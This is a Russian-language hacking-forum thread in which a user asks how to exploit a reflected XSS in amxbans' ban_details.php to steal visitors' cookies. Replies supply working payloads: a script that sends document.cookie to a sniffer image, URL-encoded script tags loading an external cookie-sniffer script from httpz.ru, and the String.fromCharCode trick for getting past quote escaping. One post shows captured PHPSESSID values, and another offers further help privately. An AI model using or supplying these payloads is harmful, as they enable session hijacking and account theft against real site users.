|
нужна помощь (пассивная xss?)
http://forum.antichat.ru/thread121710.html
давным давно ничем подобным не занимался - вспоминаю.. Вопрос, собственно: amxbans -> ban_details.php?ban_info[ban_reason]=/javascript_code/ работает частично. alert(document.cookie) проходит. Пытаюсь подставить <script>img = new Image(); img.src = "website/sniffimage.gif?"+document.cookie;</script> - оно "фильтрует" кавычки. Точнее, экранирует их в \"website/sniffimage.gif\". Залил простой скрипт (x.js: "<script>alert(hi);</script>") на сервер, пытался достучаться до него посредством <script src=blabla></script> дабы обойтись без кавычек. Не работает. Подскажите, пжалста, выходы из положения, или хотяб намекните. Благодарю заранее. |
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%68%69%2 9%3B%3C%2F%73%63%72%69%70%74%3E
может так получится, точно незнаю ))) |
Спасибо, url-encode пробовал оба варианта. Не работает..
|
вот еще как можно, на примере моего снифера
%3E%3CSCRIPT%20type=text/javascript%20src=http://httpz.ru/csmxo0306igo.js%3E%3C/SCRIPT%3E |
Тем-же снффом пользуюсь )..
Оно мне не в лог пишет, а в адресной строке оставляет все куки: http://httpz.ru/nqk7ksje7ro.gif?PHPSESSID=cefd4708a36ea...... |
так и в логе и там оставляет, можно мне адрес странички с xss в личку, может помогу ;)
|
icq 781954
|
юзай String.fromCharCode
|
%3E%3CSCRIPT%20type=text/javascript%20src=http://httpz.ru/csmxo0306igo.js%3E%3C/SCRIPT%3E
итак всё работает))) только что проверял))) у него что то со снифом наверно или он гонит)) |
| Время: 03:32 |